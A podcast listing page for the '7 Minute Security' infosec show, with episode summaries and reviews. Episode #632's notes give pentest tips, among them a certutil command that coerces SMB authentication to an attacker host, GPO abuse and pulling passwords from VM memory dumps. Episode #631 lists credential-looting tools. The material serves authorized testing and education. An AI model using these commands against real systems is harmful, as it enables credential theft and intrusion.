632 episodes

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

7 Minute Security Brian Johnson

    • Technology
    • 4.7 • 68 Ratings

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

    7MS #633: How to Create a Security Knowledgebase with Docusaurus

    7MS #633: How to Create a Security Knowledgebase with Docusaurus

    Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus!  It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include:
    docusaurus.config.js – for setting the site title and key config settings sidebars.js – used to create/edit navigation bar menus /src/css/custom.css – to style the site

    • 14 min
    7MS #632: Tales of Pentest Pwnage – Part 59

    7MS #632: Tales of Pentest Pwnage – Part 59

    Today’s tale of pentest pwnage includes some fun stuff, including:
    SharpGPOAbuse helps abuse vulnerable GPOs!  Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address.  When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s).  If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive.  Then I really like to follow this article to pull passwords from VM memory dumps. Can’t RDP into a victim system that you’re PSRemote’d into?  Maybe RDP is listening on an alternate port!  Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber` And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

    • 48 min
    7MS #631: Tales of Pentest Pwnage – Part 58

    7MS #631: Tales of Pentest Pwnage – Part 58

    Hi friends, today’s a tale full of test tips and tools to help you in your adventures in pentesting!
    SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud’homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares Snaffler – finds all the interesting SMB shares and juicy file contents Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app! RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket

    • 15 min
    7MS #630: Epic Road Trip Served with Security Sprinkles

    7MS #630: Epic Road Trip Served with Security Sprinkles

    Today I recap a two week persona/biz road trip and talk about the security stuff that got sprinkled into it, including:
    Family members who don’t care about their personal security Weakpass – a cool collection of word lists for brute-forcing and spraying that I’d never heard of Working on two security Webinars for Netwrix (here’s part 1: Mastering Password Security & Active Directory Monitoring, and and part 2: Advanced Strategies for SQL Server Protection & Sensitive Information Security) The moment we though our credit card was stolen at a waterpark A shameless plug for our fun interview with Stu the recruiter Some internal pentest tips that have given us some gold in recent assessments Super fast, spoiler-free movie reviews of Roadhouse, Arcadian, Late Night with the Devil and The Coffee Table

    • 45 min
    7MS #629: Interview with Stu Musil of Ambient Consulting

    7MS #629: Interview with Stu Musil of Ambient Consulting

    Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions:
    How do you properly vet a recruiter you don’t know, but who offers a job opportunity you’re interested in? What questions should you ask a potential recruiter to get a feel for their level of experience in the industry (hint, if a recruiter doesn’t even have a LinkedIn page, that’s probably a red flag) Resume tips: Finding the right length and tone Tailoring your resume for each individual job Highlighting your strengths Do people still use cover letters when applying to a gig? Is a “hobbies and interests” section still a good idea on a resume (to show them you’re not a robot who works 24/7)? Lets talk about some horror and/or success stories from the world of recruiting!

    • 46 min
    7MS #628: How to Succeed in Business Without Really Crying – Part 17

    7MS #628: How to Succeed in Business Without Really Crying – Part 17

    Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including:
    Taking an inventory of all the SaaS stuff your business uses – to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don’t almost get cancelled like some did with me!) Tracking domain names, and setting up your own automated rules to notify you well ahead of time when a domain is expiring (maybe that passion project is never gonna happen…time to let those old domains go 🙂 Making a spreadsheet of all important accounts and checking all the auth methods allowed for each account – to prevent attacks such as SIM-swapping

    • 9 min

Customer Reviews

4.7 out of 5
68 Ratings

68 Ratings

mvelasco07 ,

Highly recommend!

Can’t thank Brian and the 7MS team enough for putting out such an incredible podcast. Engaging conversations, actionable tips, and insights into the cybersecurity industry abound!

TooIllOrEase ,

Get to the point

Strange how many podcasts assume listeners already love them and are dying to hear drivel-riffing. No, don't love; found via search for specific topic. Yes, your audio sounds as though recorded with distant mic on camera in a car. Fabulous! Removed!

Nebblkshts ,

Awesome

I thought I knew a few things about being a windows admin until Brian showed me a new world. I was board with where I was now I want to move into security.

Top Podcasts In Technology

Acquired
Ben Gilbert and David Rosenthal
All-In with Chamath, Jason, Sacks & Friedberg
All-In Podcast, LLC
Lex Fridman Podcast
Lex Fridman
Hard Fork
The New York Times
TED Radio Hour
NPR
Search Engine
PJ Vogt, Audacy, Jigsaw

You Might Also Like

SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)
Johannes B. Ullrich
CyberWire Daily
N2K Networks
Malicious Life
Malicious Life
Smashing Security
Graham Cluley & Carole Theriault
Cybersecurity Today
Howard Solomon
Hacking Humans
N2K Networks